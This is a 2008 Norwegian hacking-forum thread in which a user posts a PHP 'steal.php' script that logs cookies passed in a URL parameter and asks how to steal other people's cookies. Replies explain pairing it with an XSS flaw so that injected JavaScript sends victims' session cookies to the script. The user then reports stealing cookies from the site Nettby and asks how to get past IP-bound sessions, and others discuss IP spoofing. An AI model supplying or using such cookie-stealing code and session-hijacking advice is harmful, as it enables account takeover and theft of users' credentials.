Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  9 824
xcid
83 1
2. mars 2008

Kode

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
bruker dette scriptet, og log.txt chmod 777, men skjønner ikke helt ossen jeg får tak i cookien til folk slik om jeg går på /steal.php?cookie= , så blir absolutt ingenting logga, kunne noen kansje forklart litt? har søkt litt rundt på google, men har ikke funnet noe spessielt av interesse, kansje dere som helt råe på å søke, kunne hostet opp en link ellr noe sånt
robhol
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
6.437 5.686
2. mars 2008
Ingenting av dette skriptet har med cookies å gjøre. Det bare tar den variabelen som blir gitt i URL'en via GET og lagrer den til ei fil.
xcid
Trådstarter
83 1
2. mars 2008
hmm hvordan skal jeg "stjele" cookies da? :/
m0b
m0b's Avatar
DonorAdministrator
5.008 3.420
2. mars 2008
Den der siden din tar som sagt kun imot en HTTP GET og lagrer denne til fila. Det du må gjøre er å finne siden som du skal bruke dette på, og sjekke om denne er "xss-kompatibel" og dermed få f.eks javascript til å besøke siden din med steal.php og slenge med cookie-iden til klienten.

Dersom du har lyst til å leke med session hijacking, og faktisk forstå hva som skjer - kan du lese en artikkel jeg skrev for en stund siden: http://www.freakforum.nu/forum/showthread.php?t=90058 (denne forutsetter vel og merke at du er på samme nett som offeret ditt)
Sist endret av m0b; 2. mars 2008 kl. 00:31.
xcid
Trådstarter
83 1
2. mars 2008
Takk, skal lese gjennom guiden din ett par ganger, og se om jeg kommer litt vidre, den så pen ut forresten
xcid
Trådstarter
83 1
3. mars 2008
vel nå fikk jeg stjålet noe cookies fra nettby ;o men om jeg bruker cookie editer i ff, addon tools, så kommer jeg fortsatt ikke inn :S går det ikke ann?
Deezire
Tastaturkriger
Deezire's Avatar
5.280 2.052
3. mars 2008
Mest sannsynlig fordi sessionID og IP-adressen din ikke stemmer overens.
xcid
Trådstarter
83 1
3. mars 2008
:/ noen måte jeg kan få acsess uansett da?

litt boring liksom, når jeg har sittet sinnsykt lenge for og få dette til menmen

stemmer det deezire, funket når jeg stjal min brors kake, og vi er på samme nett.

det er vel ikke noe måte rundt heller :/
Sist endret av xcid; 3. mars 2008 kl. 15:44.
Camv
421 2
4. mars 2008
Sitat av xcid

det er vel ikke noe måte rundt heller :/
Vis hele sitatet...
Det går ann å forge (spoofe) en ip, men da må du vite ip'en cookien/session tilhørte. Står litt om det på http://www.iss.net/security_center/a...ng/default.htm og http://en.wikipedia.org/wiki/IP_address_spoofing
m0b
m0b's Avatar
DonorAdministrator
5.008 3.420
4. mars 2008
Camv: Vel, for at dette skal fungere - så endres headeren slik at avsenderadressen blir endret. Dette betyr i så måte at mottakeren sender svaret sitt til det avsenderen har satt som forge-avsender, og du som angriper vil ikke få innholdet som du håper på. I tillegg til dette, så benytter TCP/IP seg av sekvensnummer når et three-way-handshake initialiseres, og sekvensnummerene vil bli benyttet fortløpende under transaksjonene for TCP. Dersom sekvensnummer ikke stemmer, vil ikke mottaker svare og du sitter igjen uten dataen som du håper på. Konklusjonen er at forging av avsenderadresse er et tema når du ikke trenger å motta data tilbake, men når det kommer til HTTP-protokollen er det krav.
Sist endret av m0b; 4. mars 2008 kl. 11:22.